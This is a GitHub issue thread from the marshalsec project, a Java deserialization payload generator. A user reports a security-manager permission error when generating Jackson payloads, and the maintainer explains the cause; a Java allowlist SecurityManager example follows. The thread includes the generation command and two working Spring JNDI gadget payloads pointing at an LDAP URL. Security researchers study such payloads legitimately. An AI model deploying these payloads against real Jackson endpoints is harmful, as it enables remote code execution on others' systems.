mbechler / marshalsec

MIT License

Java access denied error #12

Closed S3cur3Th1sSh1t closed 4 years ago

S3cur3Th1sSh1t commented 4 years ago

Hi,

I'm currently trying to generate/test all payloads for the Jackson Marshaller with the following command:

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a

The first two payloads are shown, but then I always get exception messages telling that the Java access for system modules is denied. Also tried running as root; seems to be a Java policy/configuration problem. Also tried different systems, same behaviour.

Do I have to change the default Java configuration to get all payloads generated, or am I missing some argument for the tool?

java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.Jackson -a

["org.springframework.beans.factory.config.PropertyPathFactoryBean",{"targetBeanName":"ldap://localhost:1389/obj","propertyPath":"foo","beanFactory":["org.springframework.jndi.support.SimpleJndiBeanFactory",{"shareableResources":["ldap://localhost:1389/obj"]}]}]

["java.util.HashSet",[["org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor",{"beanFactory":["org.springframework.jndi.support.SimpleJndiBeanFactory",{"shareableResources":["ldap://localhost:1389/obj"]}],"adviceBeanName":"ldap://localhost:1389/obj"}],["org.springframework.aop.support.DefaultBeanFactoryPointcutAdvisor",{}]]]
java.lang.reflect.InvocationTargetException
        at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke0(Native Method)
        at java.base/jdk.internal.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62)
        at java.base/jdk.internal.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43)
        at java.base/java.lang.reflect.Method.invoke(Method.java:564)
        at marshalsec.MarshallerBase.createObject(MarshallerBase.java:331)
        at marshalsec.MarshallerBase.doRun(MarshallerBase.java:165)
        at marshalsec.MarshallerBase.runAll(MarshallerBase.java:147)
        at marshalsec.MarshallerBase.run(MarshallerBase.java:115)
        at marshalsec.Jackson.main(Jackson.java:289)
Caused by: java.security.AccessControlException: access denied ("java.lang.RuntimePermission" "accessSystemModules")
        at java.base/java.security.AccessControlContext.checkPermission(AccessControlContext.java:472)
        at java.base/java.security.AccessController.checkPermission(AccessController.java:895)
        at java.base/java.lang.SecurityManager.checkPermission(SecurityManager.java:335)
        at marshalsec.SideEffectSecurityManager.checkPermission(SideEffectSecurityManager.java:76)
        at java.base/jdk.internal.module.SystemModuleFinders$SystemModuleReader.checkPermissionToConnect
mbechler commented 4 years ago

Just a missing permission in the security manager used to check that no strange things happen during serialization. Should be fixed. Thanks.
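As an added illustration (not marshalsec's own code) of the allowlist pattern behind the SideEffectSecurityManager in the trace: every permission not listed is denied, so the generator can build a payload that references ldap://localhost:1389 without the JVM ever contacting it, and an entry missing from the allowlist (as accessSystemModules was here on Java 9+) surfaces as exactly this AccessControlException. The class name and permission list are constructed; it assumes Java 11 (SecurityManager is deprecated for removal since 17, and 18+ needs -Djava.security.manager=allow to install one).

```java
import java.net.Socket;
import java.security.AccessControlException;
import java.security.Permission;
import java.util.Set;
// Constructed allowlist SecurityManager (hypothetical class, not marshalsec's
// SideEffectSecurityManager): any permission not listed in ALLOWED is denied.
public class NoSideEffectsDemo extends SecurityManager {
    // Java 9+ checks RuntimePermission("accessSystemModules") when resources are
    // located in JDK modules through jrt:; drop that entry to reproduce this issue.
    private static final Set<String> ALLOWED = Set.of(
        "java.lang.RuntimePermission:accessSystemModules",
        "java.lang.RuntimePermission:accessDeclaredMembers",
        "java.lang.RuntimePermission:loadLibrary.net",  // JDK loads these natives
        "java.lang.RuntimePermission:loadLibrary.nio",  // lazily on first socket use
        "java.lang.reflect.ReflectPermission:suppressAccessChecks",
        "java.security.SecurityPermission:*",  // "<type>:*" allows every name of it
        "java.util.PropertyPermission:*");
    @Override
    public void checkPermission(Permission p) {
        String type = p.getClass().getName();
        if (ALLOWED.contains(type + ":" + p.getName()) || ALLOWED.contains(type + ":*")) return;
        throw new AccessControlException("access denied " + p, p);
    }
    // Introspection a marshaller does while building a payload: null if allowed, else the missing permission.
    static Permission missingForIntrospection() {
        try {
            Object.class.getDeclaredMethods();
            return null;
        } catch (AccessControlException e) {
            return e.getPermission();
        }
    }
    // The side effect a JNDI gadget would have at generation time, an outbound connection
    // to ldap://localhost:1389; true means the manager refused the SocketPermission "connect".
    static boolean blocksLdapCallback() {
        try (Socket s = new Socket("127.0.0.1", 1389)) {
            return false;
        } catch (AccessControlException e) {
            return true;
        } catch (java.io.IOException e) {
            return false; // check skipped; the network layer was reached
        }
    }
    public static void main(String[] args) {
        System.setSecurityManager(new NoSideEffectsDemo());
        System.out.println("missing permission: " + missingForIntrospection());
        System.out.println("LDAP callback blocked: " + blocksLdapCallback());
    }
}
```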